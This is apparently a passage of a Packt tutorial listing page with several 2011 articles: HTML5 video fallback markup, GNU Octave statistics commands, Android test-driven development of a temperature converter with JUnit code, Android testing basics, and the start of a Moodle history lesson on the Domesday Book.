          value="controlbar=over&amp;image=__POSTER__.JPG&amp;file=__VIDEO__.MP4" />
        <img src="__VIDEO__.JPG" width="640" height="360" alt="__TITLE__"
          title="No video playback capabilities, please download the video below" />
      </object>

So far, we're still using the approach of serving the new HTML5 video element to those browsers capable of handling it, and using Flash as our first fallback option. But what happens next if Flash isn't an option gets interesting:

    <track kind="captions" src="videocaptions.srt" srclang="en" />

What the heck is that, you might be wondering. "The track element allows authors to specify explicit external timed text tracks for media elements. It does not represent anything on its own." – W3C HTML5 specification

Here's our chance to use another new part of the HTML5 spec: the new <track> element. Now we can reference the type of external file specified in kind="captions". As you can guess, kind="captions" is for a caption file, whereas kind="descriptions" is for an audio description. Of course, the src calls the specific file, and srclang sets the source language for the new HTML5 track element. In this case, en represents English. Unfortunately, no browsers currently support the new track element.

Lastly, we allow one last bit of fallback content in case the user can't use the new HTML5 video element or Flash, when we give them something purely text based:

    <p>Final fallback content</p>

Now, even if the user can't see an image, they'll at least have some descriptive content served to them. Next, we'll create a container div to house our text-based captions. Since no browser currently supports closed captioning for the new HTML5 audio or video elements, we'll have to leave room to include our own:

    <div id="captions"></div>

Lastly, we'll include Kroc's text prompts to download the HTML5 video in closed or open file formats:

    <p><strong>Download Video:</strong>
      Closed Format: <a href="__VIDEO__.MP4">"MP4"</a>
      Open Format: <a href="__VIDEO__.OGV">"Ogg"</a>
    </p>
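The same multi-format, graceful-fallback thinking applies to the new audio element. As a minimal sketch (the file names are placeholders in the same spirit as __VIDEO__ above, not part of the original recipe):

    <audio controls>
      <source src="__AUDIO__.MP3" type="audio/mpeg" />
      <source src="__AUDIO__.OGG" type="audio/ogg" />
      <p>No HTML5 audio support.
        <a href="__AUDIO__.MP3">Download the MP3</a> instead.</p>
    </audio>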
GNU Octave: data analysis examples

Packt
28 Jun 2011
7 min read
Loading data files

When performing a statistical analysis of a particular problem, you often have some data stored in a file. You can save your variables (or the entire workspace) using different file formats and then load them back in again. Octave can, of course, also load data from files generated by other programs. There are certain restrictions when you do this, which we will discuss here. In what follows, we will only consider ASCII files, that is, readable text files.

When you load data from an ASCII file using the load command, the data is treated as a two-dimensional array. We can then think of the data as a matrix, where lines represent the matrix rows and columns the matrix columns. For this matrix to be well defined, the data must be organized such that all the rows have the same number of columns (and therefore the columns the same number of rows). For example, the content of a file called series.dat can be:

We then load this into Octave's workspace:

    octave:1> load -ascii series.dat;

whereby the data is stored in the variable named series. In fact, Octave is capable of loading the data even if you do not specify the ASCII format. The number of rows and columns are then:

    octave:2> size(series)
    ans =
       4   3

I prefer the file extension .dat but, again, this is optional and can be anything you wish, say .txt, .ascii, .data, or nothing at all.

In the data files you can have:

- Octave comments
- Data blocks separated by blank lines (or equivalent empty rows)
- Tabs or single and multi-space number separation

Thus, the following data file will successfully load into Octave:

    # First block
    1 232 334
    2 245 334
    3 456 342
    4 555 321

    # Second block
    1 231 334
    2 244 334
    3 450 341
    4 557 327

The resulting variable is a matrix with 8 rows and 3 columns. If you know the number of blocks or the block sizes, you can then separate the blocked data.

Now, the following data stored in the file bad.dat will not load into Octave's workspace:

    1 232.1 334
    2 245.2
    3 456.23
    4 555.6

because line 1 has three columns whereas lines 2-4 have two columns. If you try to load this file, Octave will complain:

    octave:3> load -ascii bad.dat
    error: load: bad.dat: inconsistent number of columns near line 2
    error: load: unable to extract matrix size from file 'bad.dat'

Simple descriptive statistics

Consider an Octave function mcintgr and its vectorized version mcintgrv. This function can evaluate the integral of a mathematical function f over some interval [a; b] where the function is positive. The Octave function is based on the Monte Carlo method, and the return value, that is, the integral, is therefore a stochastic variable. When we calculate a given integral, we should as a minimum present the result as a mean, or another appropriate measure of a central value, together with an associated statistical uncertainty. This is true for any other stochastic variable, whether it is the height of the pupils in a class, the length of a plant's leaves, and so on. In this section, we will use Octave for the most simple statistical description of stochastic variables.

Histogram and moments

Let us calculate the integral given in Equation (5.9) one thousand times using the vectorized version of the Monte Carlo integrator:

    octave:4> for i=1:1000
    > s(i) = mcintgrv("sin", 0, pi, 1000);
    > endfor

The array s now contains a sequence of numbers which we know are approximately 2.
Before we make any quantitative statistical description, it is always a good idea to first plot a histogram of the data, as this gives an approximation to the true underlying probability distribution of the variable s. The easiest way to do this is by using Octave's hist function, which can be called using:

    octave:5> hist(s, 30, 1)

The first argument, s, to hist is the stochastic variable, the second is the number of bins that s should be grouped into (here we have used 30), and the third argument gives the sum of the heights of the histogram (here we set it to 1). The histogram is shown in the figure below. If hist is called via the command hist(s), s is grouped into ten bins and the sum of the heights of the histogram is equal to sum(s).

From the figure, we see that mcintgrv produces a sequence of random numbers that appear to be normal (or Gaussian) distributed with a mean of 2. This is what we expected. It then makes good sense to describe the variable via the sample mean, defined as

    mean(s) = (1/N) * sum_i s_i

where N is the number of samples (here 1000) and s_i is the i'th data point, as well as the sample variance, given by

    var(s) = (1/(N-1)) * sum_i (s_i - mean(s))^2

The variance is a measure of the distribution width and therefore an estimate of the statistical uncertainty of the mean value. Sometimes, one uses the standard deviation instead of the variance. The standard deviation is simply the square root of the variance. To calculate the sample mean, sample variance, and the standard deviation in Octave, you use:

    octave:6> mean(s)
    ans = 1.9999
    octave:7> var(s)
    ans = 0.002028
    octave:8> std(s)
    ans = 0.044976

In the statistical description of the data, we can also include the skewness, which measures the symmetry of the underlying distribution around the mean. If it is positive, it is an indication that the distribution has a long tail stretching towards positive values with respect to the mean. If it is negative, it has a long negative tail. The skewness is often defined as

    skewness(s) = (1/N) * sum_i (s_i - mean(s))^3 / std(s)^3

We can calculate this in Octave via:

    octave:9> skewness(s)
    ans = -0.15495

This result is a bit surprising because we would assume from the histogram that the data set represents numbers picked from a normal distribution, which is symmetric around the mean and therefore has zero skewness. It illustrates an important point—be careful using the skewness as a direct measure of the distribution's symmetry—you need a very large data set to get a good estimate.

You can also calculate the kurtosis, which measures the flatness of the sample distribution compared to a normal distribution. Negative kurtosis indicates a relatively flatter distribution around the mean, and a positive kurtosis that the sample distribution has a sharp peak around the mean. The kurtosis is defined by the following:

    kurtosis(s) = (1/N) * sum_i (s_i - mean(s))^4 / std(s)^4 - 3

It can be calculated by the kurtosis function:

    octave:10> kurtosis(s)
    ans = -0.02310

The kurtosis has the same problem as the skewness—you need a very large sample size to obtain a good estimate.
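To tie these definitions to the built-in functions, here is a small sketch that recomputes the quantities by hand. It assumes the array s from above; the skewness and kurtosis lines may differ from the built-ins in the last digits, depending on the normalization your Octave version uses:

    N  = numel(s);
    m  = sum(s)/N;                      % sample mean
    v  = sum((s - m).^2)/(N - 1);       % sample variance (N-1, as var uses)
    sd = sqrt(v);                       % standard deviation
    sk = sum((s - m).^3)/N / sd^3;      % skewness, per the definition above
    ku = sum((s - m).^4)/N / sd^4 - 3;  % kurtosis, per the definition above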
Sample moments

As you may know, the sample mean, variance, skewness, and kurtosis are examples of sample moments. The mean is related to the first moment, the variance to the second moment, and so forth. Now, the moments are not uniquely defined. One can, for example, define the k'th absolute sample moment p_k^a and the k'th central sample moment p_k^c as

    p_k^a = (1/N) * sum_i s_i^k
    p_k^c = (1/N) * sum_i (s_i - mean(s))^k

Notice that the first absolute moment is simply the sample mean, but the first central sample moment is zero.

In Octave, you can easily retrieve the sample moments using the moment function; for example, to calculate the second central sample moment you use:

    octave:11> moment(s, 2, 'c')
    ans = 0.002022

Here the first input argument is the sample data, the second defines the order of the moment, and the third argument specifies whether we want the central moment 'c' or the absolute moment 'a', which is the default. Compare the output with the output from Command 7—why is it not the same?
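A hint for that closing question: var normalizes by N - 1, while the second central moment normalizes by N, so the two differ by a factor of (N - 1)/N. A quick check, assuming s from above:

    N = numel(s);
    moment(s, 2, 'c')       % second central moment: sum((s - mean(s)).^2)/N
    var(s) * (N - 1)/N      % should match the previous line up to rounding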
Android application testing: TDD and the temperature converter

Packt
27 Jun 2011
7 min read
Getting started with TDD

Briefly, Test Driven Development is the strategy of writing tests along with the development process. These test cases are written in advance of the code that is supposed to satisfy them. A single test is added, then the code needed to satisfy the compilation of this test, and finally the full set of test cases is run to verify their results. This contrasts with other approaches to the development process, where the tests are written at the end when all the coding has been done.

Writing the tests in advance of the code that satisfies them has several advantages. First, the tests get written one way or another, whereas if they are left till the end, it is highly probable that they will never be written. Second, developers take more responsibility for the quality of their work. Design decisions are taken in single steps, and finally the code satisfying the tests is improved by refactoring it. This UML activity diagram depicts Test Driven Development to help us understand the process:

The following sections explain the individual activities depicted in this activity diagram.

Writing a test case

We start our development process with writing a test case. This apparently simple process will put some machinery to work inside our heads. After all, it is not possible to write some code, test it or not, if we don't have a clear understanding of the problem domain and its details. Usually, this step will get you face to face with the aspects of the problem you don't understand, and which you need to grasp if you want to model and write the code.

Running all tests

Once the test is written, the obvious following step is to run it, together with the other tests we have written so far. Here, the importance of an IDE with built-in support for the testing environment is perhaps more evident than in other situations, and this could cut the development time by a good fraction. It is expected that, at first, our test fails, as we still haven't written any code!

To be able to complete our test, we usually write additional code and take design decisions. The additional code written is the minimum possible to get our test to compile. Consider here that not compiling is failing. When we get the test to compile and run, if the test fails, then we try to write the minimum amount of code necessary to make the test succeed. This may sound awkward at this point, but the following code example in this article will help you understand the process. Optionally, instead of running all tests again, you can just run the newly added test first to save some time, as sometimes running the tests on the emulator can be rather slow. Then run the whole test suite to verify that everything is still working properly. We don't want to add a new feature by breaking an existing one.

Refactoring the code

When the test succeeds, we refactor the code added to keep it tidy, clean, and minimal. We run all the tests again to verify that our refactoring has not broken anything and, if the tests are again satisfied and no more refactoring is needed, we finish our task. Running the tests after refactoring is an incredible safety net which has been put in place by this methodology. If we made a mistake refactoring an algorithm, extracting variables, introducing parameters, changing signatures, or whatever your refactoring is composed of, this testing infrastructure will detect the problem.
Furthermore, if some refactoring or optimization could not be valid for every possible case we can verify it for every case used by the application and expressed as a test case. What is the advantage? Personally, the main advantage I've seen so far is that you focus your destination quickly and is much difficult to divert implementing options in your software that will never be used. This implementation of unneeded features is a wasting of your precious development time and effort. And as you may already know, judiciously administering these resources may be the difference between successfully reaching the end of the project or not. Probably, Test Driven Development could not be indiscriminately applied to any project. I think that, as well as any other technique, you should use your judgment and expertise to recognize where it can be applied and where not. But keep this in mind: there are no silver bullets. The other advantage is that you always have a safety net for your changes. Every time you change a piece of code, you can be absolutely sure that other parts of the system are not affected as long as there are tests verifying that the conditions haven't changed. Understanding the testing requirements To be able to write a test about any subject, we should first understand the Subject under test. We also mentioned that one of the advantages is that you focus your destination quickly instead of revolving around the requirements. Translating requirements into tests and cross-referencing them is perhaps the best way to understand the requirements, and be sure that there is always an implementation and verification for all of them. Also, when the requirements change (something that is very frequent in software development projects), we can change the tests verifying these requirements and then change the implementation to be sure that everything was correctly understood and mapped to code. Creating a sample project—the Temperature Converter Our examples will revolve around an extremely simple Android sample project. It doesn't try to show all the fancy Android features but focuses on testing and gradually building the application from the test, applying the concepts learned before. Let's pretend that we have received a list of requirements to develop an Android temperature converter application. Though oversimplified, we will be following the steps you normally would to develop such an application. However, in this case we will introduce the Test Driven Development techniques in the process. The list of requirements Most usual than not, the list of requirements is very vague and there is a high number of details not fully covered. 
As an example, let's pretend that we receive this list from the project owner: The application converts temperatures from Celsius to Fahrenheit and vice-versa The user interface presents two fields to enter the temperatures, one for Celsius other for Fahrenheit When one temperature is entered in one field the other one is automatically updated with the conversion If there are errors, they should be displayed to the user, possibly using the same fields Some space in the user interface should be reserved for the on screen keyboard to ease the application operation when several conversions are entered Entry fields should start empty Values entered are decimal values with two digits after the point Digits are right aligned Last entered values should be retained even after the application is paused User interface concept design Let's assume that we receive this conceptual user interface design from the User Interface Design team: Creating the projects Our first step is to create the project. As we mentioned earlier, we are creating a main and a test project. The following screenshot shows the creation of the TemperatureConverter project (all values are typical Android project values): When you are ready to continue you should press the Next > button in order to create the related test project. The creation of the test project is displayed in this screenshot. All values will be selected for you based on your previous entries:
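With both projects in place, the TDD cycle described earlier starts with a failing test. The following is only a minimal sketch of what such a first test could look like, not code from the article: it assumes the TemperatureConverter utility class and its static fahrenheitToCelsius(double) method, neither of which exists yet, so the test does not even compile; in TDD, not compiling counts as failing:

    // A first test sketch written before any production code exists.
    // TemperatureConverter and fahrenheitToCelsius() are assumed here;
    // they will only be created when this test forces us to.
    import junit.framework.TestCase;

    public class TemperatureConverterFirstTests extends TestCase {

        public void testFreezingPointConversion() {
            // 32F is the freezing point of water, which is 0C
            final double expectedCelsius = 0.0;
            final double actualCelsius =
                    TemperatureConverter.fahrenheitToCelsius(32.0);
            // compare against a delta because we are dealing with doubles
            assertEquals(expectedCelsius, actualCelsius, 0.0001);
        }
    }

Making this sketch compile and pass would then drive the first design decisions, exactly as the activity diagram above prescribes.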

Android Application Testing: Adding Functionality to the UI

Packt
27 Jun 2011
10 min read
Android Application Testing Guide
Build intensively tested and bug-free Android applications

The user interface is in place. Now we start adding some basic functionality. This functionality will include the code to handle the actual temperature conversion.

Temperature conversion

From the list of requirements from the previous article we can obtain this statement: When one temperature is entered in one field, the other one is automatically updated with the conversion.

Following our plan, we must implement this as a test to verify that the correct functionality is there. Our test would look something like this:

    @UiThreadTest
    public final void testFahrenheitToCelsiusConversion() {
        mCelsius.clear();
        mFahrenheit.clear();
        final double f = 32.5;
        mFahrenheit.requestFocus();
        mFahrenheit.setNumber(f);
        mCelsius.requestFocus();
        final double expectedC = TemperatureConverter.fahrenheitToCelsius(f);
        final double actualC = mCelsius.getNumber();
        final double delta = Math.abs(expectedC - actualC);
        final String msg = "" + f + "F -> " + expectedC + "C but was " +
                actualC + "C (delta " + delta + ")";
        assertTrue(msg, delta < 0.005);
    }

Firstly, as we already know, to interact with the UI and change its values we should run the test on the UI thread, and thus it is annotated with @UiThreadTest.

Secondly, we are using a specialized class to replace EditText, providing some convenience methods like clear() or setNumber(). This will improve our application design.

Next, we invoke a converter, named TemperatureConverter, a utility class providing the different methods to convert between different temperature units and using different types for the temperature values.

Finally, as we will be truncating the results to provide them in a suitable format presented in the user interface, we should compare against a delta to assert the value of the conversion.

Creating the test as it is will force us to follow the planned path. Our first objective is to add the needed code to get the test to compile and then to satisfy the test's needs.

The EditNumber class

In our main project, not the test one, we should create the class EditNumber extending EditText, as we need to extend its functionality. We use Eclipse's help to create this class using File | New | Class or its shortcut in the toolbar. This screenshot shows the window that appears after using this shortcut:

The following table describes the most important fields and their meaning in the previous screen:

Source folder: The source folder for the newly-created class. In this case, the default location is fine.
Package: The package where the new class is created. In this case, the default package com.example.aatg.tc is fine too.
Name: The name of the class. In this case we use EditNumber.
Modifiers: Modifiers for the class. In this particular case we are creating a public class.
Superclass: The superclass for the newly-created type. We are creating a custom View and extending the behavior of EditText, so this is precisely the class we select for the supertype. Remember to use Browse... to find the correct package.
Which method stubs would you like to create?: These are the method stubs we want Eclipse to create for us. Selecting Constructors from superclass and Inherited abstract methods would be of great help. As we are creating a custom View, we should provide the constructors that are used in different situations, for example when the custom View is used inside an XML layout.
Do you want to add comments?: Some comments are added automatically when this option is selected. You can configure Eclipse to personalize these comments.

Once the class is created, we need to change the type of the fields first in our test:

    public class TemperatureConverterActivityTests extends
            ActivityInstrumentationTestCase2<TemperatureConverterActivity> {

        private TemperatureConverterActivity mActivity;
        private EditNumber mCelsius;
        private EditNumber mFahrenheit;
        private TextView mCelsiusLabel;
        private TextView mFahrenheitLabel;
        ...

Then change any cast that is present in the tests. Eclipse will help you do that.

If everything goes well, there are still two problems we need to fix before being able to compile the test:

We still don't have the methods clear() and setNumber() in EditNumber
We don't have the TemperatureConverter utility class

To create the methods, we use Eclipse's helpful actions. Let's choose Create method clear() in type EditNumber. Do the same for setNumber() and getNumber().

Finally, we must create the TemperatureConverter class. Be sure to create it in the main project and not in the test project. Having done this, in our test select Create method fahrenheitToCelsius in type TemperatureConverter.

This fixes our last problem and leads us to a test that we can now compile and run. Surprisingly, or not, when we run the tests, they will fail with an exception:

    09-06 13:22:36.927: INFO/TestRunner(348): java.lang.ClassCastException: android.widget.EditText
    09-06 13:22:36.927: INFO/TestRunner(348): at com.example.aatg.tc.test.TemperatureConverterActivityTests.setUp(TemperatureConverterActivityTests.java:41)
    09-06 13:22:36.927: INFO/TestRunner(348): at junit.framework.TestCase.runBare(TestCase.java:125)

That is because we updated all of our Java files to include our newly-created EditNumber class but forgot to change the XMLs, and this could only be detected at runtime. Let's proceed to update our UI definition:

    <com.example.aatg.tc.EditNumber
        android:layout_height="wrap_content"
        android:id="@+id/celsius"
        android:layout_width="match_parent"
        android:layout_margin="@dimen/margin"
        android:gravity="right|center_vertical"
        android:saveEnabled="true" />

That is, we replace the original EditText with com.example.aatg.tc.EditNumber, which is a View extending the original EditText.

Now we run the tests again and we discover that all tests pass. But wait a minute, we haven't implemented any conversion or any handling of values in the new EditNumber class and all the tests passed with no problem. Yes, they passed because we don't have enough restrictions in our system and the ones in place simply cancel each other out.

Before going further, let's analyze what just happened. Our test invoked the mFahrenheit.setNumber(f) method to set the temperature entered in the Fahrenheit field, but setNumber() is not implemented and is an empty method as generated by Eclipse that does nothing at all. So the field remains empty.

Next, the value for expectedC—the expected temperature in Celsius—is calculated by invoking TemperatureConverter.fahrenheitToCelsius(f), but this is also an empty method as generated by Eclipse. In this case, because Eclipse knows about the return type, it returns a constant 0. So expectedC becomes 0.

Then the actual value for the conversion is obtained from the UI, in this case by invoking getNumber() on EditNumber. But once again this method was automatically generated by Eclipse and, to satisfy the restriction imposed by its signature, it returns a value that Eclipse fills with 0.

The delta value is again 0, as calculated by Math.abs(expectedC - actualC). And finally our assertion assertTrue(msg, delta < 0.005) is true because delta=0 satisfies the condition, and the test passes.

So, is our methodology flawed, as it cannot detect a simple situation like this? No, not at all. The problem here is that we don't have enough restrictions, and those we have are satisfied by the default values used by Eclipse to complete auto-generated methods. One alternative could be to throw exceptions in all of the auto-generated methods, something like RuntimeException("not yet implemented"), to detect their use when not implemented. But we will be adding enough restrictions in our system to easily trap this condition.

TemperatureConverter unit tests

It seems, from our previous experience, that the default conversion implemented by Eclipse always returns 0, so we need something more robust. Otherwise it would only return a valid result when the parameter takes the value 32F.

The TemperatureConverter is a utility class not related to the Android infrastructure, so a standard unit test will be enough to test it.

We create our tests using Eclipse's File | New | JUnit Test Case, filling in some appropriate values, and selecting the method to generate a test, as shown in the next screenshot.

Firstly, we create the unit test by extending junit.framework.TestCase and selecting com.example.aatg.tc.TemperatureConverter as the class under test:

Then by pressing the Next > button we can obtain the list of methods we may want to test:

We have implemented only one method in TemperatureConverter, so it's the only one appearing in the list. Other classes implementing more methods will display all the options here.

It's good to note that even if the test method is auto-generated by Eclipse, it won't pass. It will fail with the message Not yet implemented to remind us that something is missing. Let's start by changing this:

    /**
     * Test method for {@link com.example.aatg.tc.TemperatureConverter#fahrenheitToCelsius(double)}.
     */
    public final void testFahrenheitToCelsius() {
        for (double c: conversionTableDouble.keySet()) {
            final double f = conversionTableDouble.get(c);
            final double ca = TemperatureConverter.fahrenheitToCelsius(f);
            final double delta = Math.abs(ca - c);
            final String msg = "" + f + "F -> " + c + "C but is " + ca +
                    " (delta " + delta + ")";
            assertTrue(msg, delta < 0.0001);
        }
    }

Creating a conversion table with values for different temperature conversions we know from other sources is a good way to drive this test:

    private static final HashMap<Double, Double> conversionTableDouble =
            new HashMap<Double, Double>();

    static {
        // initialize (celsius, fahrenheit) pairs
        conversionTableDouble.put(0.0, 32.0);
        conversionTableDouble.put(100.0, 212.0);
        conversionTableDouble.put(-1.0, 30.20);
        conversionTableDouble.put(-100.0, -148.0);
        conversionTableDouble.put(32.0, 89.60);
        conversionTableDouble.put(-40.0, -40.0);
        conversionTableDouble.put(-273.0, -459.40);
    }

We may just run this test to verify that it fails, giving us this trace:

    junit.framework.AssertionFailedError: -40.0F -> -40.0C but is 0.0 (delta 40.0)
    at com.example.aatg.tc.test.TemperatureConverterTests.testFahrenheitToCelsius(TemperatureConverterTests.java:62)
    at java.lang.reflect.Method.invokeNative(Native Method)
    at android.test.AndroidTestRunner.runTest(AndroidTestRunner.java:169)
    at android.test.AndroidTestRunner.runTest(AndroidTestRunner.java:154)
    at android.test.InstrumentationTestRunner.onStart(InstrumentationTestRunner.java:520)
    at android.app.Instrumentation$InstrumentationThread.run(Instrumentation.java:1447)

Well, this was something we were expecting, as our conversion always returns 0. Implementing our conversion, we discover that we need an ABSOLUTE_ZERO_F constant:

    public class TemperatureConverter {
        public static final double ABSOLUTE_ZERO_C = -273.15d;
        public static final double ABSOLUTE_ZERO_F = -459.67d;

        private static final String ERROR_MESSAGE_BELOW_ZERO_FMT =
                "Invalid temperature: %.2f%c below absolute zero";

        public static double fahrenheitToCelsius(double f) {
            if (f < ABSOLUTE_ZERO_F) {
                throw new InvalidTemperatureException(
                        String.format(ERROR_MESSAGE_BELOW_ZERO_FMT, f, 'F'));
            }
            return ((f - 32) / 1.8d);
        }
    }

Absolute zero is the theoretical temperature at which entropy would reach its minimum value. To be able to reach this absolute zero state, according to the laws of thermodynamics, the system should be isolated from the rest of the universe. Thus it is an unreachable state. However, by international agreement, absolute zero is defined as 0K on the Kelvin scale, as -273.15°C on the Celsius scale, and as -459.67°F on the Fahrenheit scale.

We are creating a custom exception, InvalidTemperatureException, to indicate a failure in providing a valid temperature to the conversion method. This exception is created simply by extending RuntimeException:

    public class InvalidTemperatureException extends RuntimeException {
        public InvalidTemperatureException(String msg) {
            super(msg);
        }
    }

Running the tests again, we now discover that the testFahrenheitToCelsiusConversion test fails while testFahrenheitToCelsius succeeds. This tells us that conversions are now correctly handled by the converter class but there are still some problems with the UI handling this conversion. A closer look at the failure trace reveals that something is still returning 0 when it shouldn't. This reminds us that we are still lacking a proper EditNumber implementation. Before proceeding to implement the mentioned methods, let's create the corresponding tests to verify that what we are implementing is correct.
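Looking ahead, the requirements also call for the inverse conversion. The article does not show it at this point, so the following is only an assumed sketch of how celsiusToFahrenheit could mirror the method above, reusing the ABSOLUTE_ZERO_C constant and the exception already defined:

    // Assumed inverse conversion, not shown in the article at this point;
    // it mirrors fahrenheitToCelsius() and reuses the same constants.
    public static double celsiusToFahrenheit(double c) {
        if (c < ABSOLUTE_ZERO_C) {
            throw new InvalidTemperatureException(
                    String.format(ERROR_MESSAGE_BELOW_ZERO_FMT, c, 'C'));
        }
        return (c * 1.8d + 32);
    }

A corresponding unit test could then iterate over the same conversion table with keys and values swapped.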

Android Application Testing: Getting Started

Packt
24 Jun 2011
9 min read
We will avoid introductions to Android and the Open Handset Alliance (http://www.openhandsetalliance.com) as they are covered in many books already, and I am inclined to believe that if you are reading an article covering this more advanced topic you have started with Android development before. However, we will be reviewing the main concepts behind testing and the techniques, frameworks, and tools available to deploy your testing strategy on Android.

Brief history

Initially, when Android was introduced at the end of 2007, there was very little support for testing in the platform, and for some of us, very accustomed to using testing as a component intimately coupled with the development process, it was time to start developing some frameworks and tools to permit this approach.

By that time Android had some rudimentary support for unit testing using JUnit (https://junit.org/junit5/), but it was not fully supported and even less documented. In the process of writing my own library and tools, I discovered Phil Smith's Positron, an Open Source library and a very suitable alternative to support testing on Android, so I decided to extend his excellent work and bring some new and missing pieces to the table. Some aspects of test automation were not included, and I started a complementary project to fill that gap; it was consequently named Electron. And although the positron is the anti-particle of the electron, and they annihilate if they collide, take for granted that that was not the idea, but more the conservation of energy and the generation of some visible light and waves.

Later on, Electron entered the first Android Development Challenge (ADC1) in early 2008 and, though it obtained a rather good score in some categories, frameworks had no place in that competition. Should you be interested in the origin of testing on Android, please find some articles and videos that were published on my personal blog (http://dtmilano.blogspot.co.uk/search/label/electron).

By that time Unit Tests could be run on Eclipse. However, testing was not done on the real target but on a JVM on the local development computer.

Google also provided application instrumentation code through the Instrumentation class. When running an application with instrumentation turned on, this class is instantiated for you before any of the application code, allowing you to monitor all of the interaction the system has with the application. An Instrumentation implementation is described to the system through an AndroidManifest.xml file.

Software bugs

It doesn't matter how hard you try, how much time you invest in design, or even how careful you are when programming: mistakes are inevitable and bugs will appear.

Bugs and software development are intimately related. However, the term bugs to describe flaws, mistakes, or errors was used in hardware engineering many decades before computers were even invented. Notwithstanding the story about the term bug coined by Mark II operators at Harvard University, Thomas Edison wrote this in 1878 in a letter to Puskás Tivadar, showing the early adoption of the term:

"It has been just so in all of my inventions. The first step is an intuition, and comes with a burst, then difficulties arise — this thing gives out and [it is] then that 'Bugs' — as such little faults and difficulties are called — show themselves and months of intense watching, study and labor are requisite before commercial success or failure is certainly reached."

How bugs severely affect your projects

Bugs affect many aspects of your software development project, and it is clearly understood that the sooner in the process you find and squash them, the better. It doesn't matter if you are developing a simple application to publish on the Android Market, re-branding the Android experience for an operator, or creating a customized version of Android for a device manufacturer: bugs will delay your shipment and will cost you money.

Of all the software development methodologies and techniques, Test Driven Development, an agile component of the software development process, is likely the one that forces you to face your bugs earliest in the development process, and thus it is also likely that you will solve more problems up front. Furthermore, the increase in productivity can be clearly appreciated in a project where a software development team uses this technique versus one that is, in the best of cases, writing tests at the end of the development cycle. If you have been involved in software development for the mobile industry, you will have reasons to believe that with all the rush this stage never occurs. It's funny because usually this rush is to solve problems that could have been avoided.

In a study conducted by the National Institute of Standards and Technology (USA) in 2002, it was reported that software bugs cost the country's economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing were performed.

But please, don't misunderstand this message. There are no silver bullets in software development, and what will lead you to an increase in productivity and manageability of your project is the discipline of applying these methodologies and techniques to stay in control.

Why, what, how, and when to test

You should understand that early bug detection saves huge amounts of project resources and reduces software maintenance costs. This is the best known reason to write software tests for your development project. Increased productivity will soon be evident.

Additionally, writing the tests will give you a deeper understanding of the requirements and the problem to be solved. You will not be able to write tests for a piece of software you don't understand. This is also the reason behind the approach of writing tests to clearly understand legacy or third-party code, and of having the infrastructure to confidently change or update it.

The more of your code is covered by your tests, the higher your expectations of discovering the hidden bugs can be. If during this coverage analysis you find that some areas of your code are not exercised, additional tests should be added to cover this code as well. This technique requires a special instrumented Android build to collect probe data and must be disabled for any release code, because the impact on performance could severely affect application behavior.

To fill in this gap, enter EMMA (http://emma.sourceforge.net/), an open-source toolkit for measuring and reporting Java code coverage that can instrument classes for coverage offline. It supports various coverage types:

class
method
line
basic block

Coverage reports can also be obtained in different output formats. EMMA is supported to some degree by the Android framework, and it is possible to build an EMMA-instrumented version of Android.

This screenshot shows how an EMMA code coverage report is displayed in the Eclipse editor, showing green lines when the code has been tested, provided the corresponding plugin is installed.

Unfortunately, the plugin doesn't support Android tests yet, so right now you can use it for your JUnit tests only. Android coverage analysis reports are only available through HTML.

Tests should be automated, and you should run some or all tests every time you introduce a change or addition to your code, in order to ensure that all the conditions that were met before are still met and that the new code satisfies the tests as expected. This leads us to the introduction of Continuous Integration, which relies on the automation of tests and building processes. If you don't use automated testing, it is practically impossible to adopt Continuous Integration as part of the development process, and it is very difficult to ensure that changes will not break existing code.

What to test

Strictly speaking, you should test every statement in your code, but this also depends on different criteria and can be reduced to testing the main path of execution or just some methods. Usually there's no need to test something that can't be broken; for example, it usually makes no sense to test getters and setters, as you probably won't be testing the Java compiler on your own code, and the compiler will have already performed its tests.

In addition to the functional areas you should test, there are some specific areas of Android applications that you should consider. We will be looking at these in the following sections.

Activity lifecycle events

You should test that your activities handle lifecycle events correctly. If your activity should save its state during onPause() or onDestroy() events and later be able to restore it in onCreate(Bundle savedInstanceState), you should be able to reproduce and test all these conditions and verify that the state was correctly saved and restored.

Configuration-changed events should also be tested, as some of these events cause the current Activity to be recreated. You should test correct handling of the event and that the newly created Activity preserves the previous state. Configuration changes are triggered even by rotation events, so you should test your application's ability to handle these situations.

Database and filesystem operations

Database and filesystem operations should be tested to ensure that they are handled correctly. These operations should be tested in isolation at the lower system level, at a higher level through ContentProviders, or from the application itself. To test these components in isolation, Android provides some mock objects in the android.test.mock package.

Physical characteristics of the device

Well before delivering your application, you should be sure that all of the different devices it can run on are supported, or at least you should detect an unsupported situation and take pertinent measures. Among other characteristics of the devices, you may find that you should test:

Network capabilities
Screen densities
Screen resolutions
Screen sizes
Availability of sensors
Keyboard and other input devices
GPS
External storage

In this respect, Android Virtual Devices play an important role, because it is practically impossible to have access to all of the devices with all of the possible combinations of features, but you can configure an AVD for almost every situation. However, as was mentioned before, leave your final tests for actual devices, where the real users will run the application, to understand its behavior.
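As a concrete illustration of the lifecycle testing described above, a test can drive an Activity through pause and resume from the instrumentation and verify that its state survives. This is only a sketch under stated assumptions: MainActivity and its setLastValue()/getLastValue() methods are hypothetical placeholders, while callActivityOnPause() and callActivityOnResume() are standard Instrumentation methods:

    import android.test.ActivityInstrumentationTestCase2;

    public class MainActivityLifecycleTests
            extends ActivityInstrumentationTestCase2<MainActivity> {

        public MainActivityLifecycleTests() {
            super(MainActivity.class);
        }

        public void testStateSurvivesPauseAndResume() {
            final MainActivity activity = getActivity();
            // hypothetical state on the Activity under test
            activity.setLastValue("42");

            // drive the lifecycle directly from the instrumentation
            getInstrumentation().callActivityOnPause(activity);
            getInstrumentation().callActivityOnResume(activity);

            // the value must still be there after the pause/resume cycle
            assertEquals("42", activity.getLastValue());
        }
    }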

How to Create a Lesson in Moodle 2

Packt
24 Jun 2011
7 min read
History Teaching with Moodle 2
Create a History course in Moodle packed with lessons and activities to make learning and teaching History interactive and fun

Approaching the lesson

We plan to introduce our Year 7 History class to the idea of the Domesday Book as a means by which William reinforced his control over the country. William was naturally curious about the country he had just conquered. He was particularly keen to find out how much it was worth. He despatched officials to every village with detailed questions to ask about the land that the villagers worked on and the animals that they farmed with. He also sent soldiers who threatened to kill people who lied. All of the records from these village surveys were collated into the Domesday Book. Many Saxons detested the process, and the name of the book is derived from this attitude of loathing towards something they regarded as intrusive and unfair. William died before the process could be completed.

Clear lesson objectives can be stated at the start of the lesson. Students would be expected to work through each page and answer questions identical to those found in the Quiz module. The lesson gives students the opportunity to return to a page if the required level of understanding has not been achieved. The lesson questions help students to reach an understanding at their own pace.

